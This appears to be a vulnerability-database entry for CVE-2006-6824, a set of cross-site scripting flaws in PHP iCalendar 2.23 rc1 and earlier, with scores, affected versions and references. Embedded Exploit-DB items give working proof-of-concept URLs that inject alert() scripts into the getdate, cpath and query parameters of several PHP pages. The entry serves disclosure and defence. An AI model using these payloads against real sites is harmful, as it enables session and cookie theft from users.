CVE-2006-6824
Published 2006-12-29
Priority P4 · 18 · medium · CVSS 2.0 4.3 (vector AV:N/AC:M/Au:N/C:N/I:P/A:N)
EXPLOIT
EPSS: 2.44% (82.2nd percentile)
Multiple cross-site scripting (XSS) vulnerabilities in Jim Hu and Chad Little PHP iCalendar 2.23 rc1 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) getdate parameter in (a) day.php, (b) month.php, (c) year.php, (d) week.php, (e) search.php, (f) rss/index.php, (g) print.php, and (h) preferences.php; the (2) cpath parameter in (i) day.php, (j) month.php, (k) year.php, (l) week.php, and (m) search.php; the (3) query parameter in search.php; and possibly the cpath, (4) unset, and (5) set parameters in a setcookie action in preferences.php; different vectors than CVE-2006-3319. NOTE: it was later reported that vectors b, c, and d also affect 2.24.
Affected
5 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| php_icalendar | php_icalendar | <= 2.23_rc1 | — |
No detection rules found.
Exploit-DB
PHP iCalendar 1.1/2.x - 'getdate' Cross-Site Scripting (exploitdb · 2006-12-27 · CVE-2006-6824)
---
source: https://www.securityfocus.com/bid/21792/info
PHP iCalendar is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to have arbitrary script code execute in the browser of an unsuspecting user. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/phpicalendar/rss/index.php?cal=Home,US+Holidays,Work&getdate=20061225">alert()
Exploit-DB
PHP iCalendar 1.1/2.x - 'week.php' Cross-Site Scripting (exploitdb · 2006-12-27 · CVE-2006-6824)
---
source: https://www.securityfocus.com/bid/21792/info
http://www.example.com/phpicalendar/week.php?cal=all_calendars_combined971&getdate=20061225">alert()
Exploit-DB
PHP iCalendar 1.1/2.x - 'search.php' Cross-Site Scripting (exploitdb · 2006-12-27 · CVE-2006-6824)
---
source: https://www.securityfocus.com/bid/21792/info
http://www.example.com/phpicalendar/search.php?cpath=&cal=Home%2CUS%2BHolidays%2CWork&getdate=19700102&query=ss">alert()&submit.x=11&submit.y=15
http://www.example.com/phpicalendar/search.php?cpath=">alert()&cal=Home%2CUS%2BHolidays%2CWork&getdate=19700102&query=ss&submit.x=11&submit.y=12
http://www.example.com/phpi
Exploit-DB
PHP iCalendar 1.1/2.x - 'day.php' Cross-Site Scripting (exploitdb · 2006-12-27 · CVE-2006-6824)
---
source: https://www.securityfocus.com/bid/21792/info
http://www.example.com/phpicalendar/day.php?cal=all_calendars_combined971&getdate=20061225">alert()
Exploit-DB
PHP iCalendar 1.1/2.x - 'year.php' Cross-Site Scripting (exploitdb · 2006-12-27 · CVE-2006-6824)
---
source: https://www.securityfocus.com/bid/21792/info
http://www.example.com/phpicalendar/year.php?cal=all_calendars_combined971&getdate=20061225">alert()
Exploit-DB
PHP iCalendar 1.1/2.x - 'print.php' Cross-Site Scripting (exploitdb · 2006-12-27 · CVE-2006-6824)
---
source: https://www.securityfocus.com/bid/21792/info
http://www.example.com/phpicalendar/print.php?cal=Home,US+Holidays,Work&getdate=20061225%22%3E%3Cscript%3Ealert()%3C/script%3E&printview=day
Exploit-DB
PHP iCalendar 1.1/2.x - 'month.php' Cross-Site Scripting (exploitdb · 2006-12-27 · CVE-2006-6824)
---
source: https://www.securityfocus.com/bid/21792/info
http://www.example.com/phpicalendar/month.php?cal=all_calendars_combined971&getdate=20061225">alert()
Exploit-DB
PHP iCalendar 1.1/2.x - 'preferences.php' Cross-Site Scripting (exploitdb · 2006-12-27 · CVE-2006-6824)
---
source: https://www.securityfocus.com/bid/21792/info
http://www.example.com/phpicalendar/preferences.php?cal=Home,US+Holidays,Work&getdate=20061227%22%3E%3Cscript%3Ealert()%3C/script%3E
PHP iCalendar XSS in preferences.php PoC (Lostmon). Modify the target host, by default http://localhost/. Form fields: cookie_language: cookie_calendar: cpath: alert(String.fromCharCod
No writeups or analysis indexed.
References
- http://lostmon.blogspot.com/2006/12/php-icalendar-multiple-variable-cross.html
- http://secunia.com/advisories/23499
- http://securitytracker.com/id?1017449
- http://www.osvdb.org/32493
- http://www.osvdb.org/32494
- http://www.osvdb.org/32495
- http://www.osvdb.org/32496
- http://www.osvdb.org/32497
- http://www.osvdb.org/32498
- http://www.osvdb.org/32499
- http://www.osvdb.org/32500
- http://www.securityfocus.com/archive/1/485397/100/200/threaded
- http://www.securityfocus.com/bid/21792
- https://exchange.xforce.ibmcloud.com/vulnerabilities/31146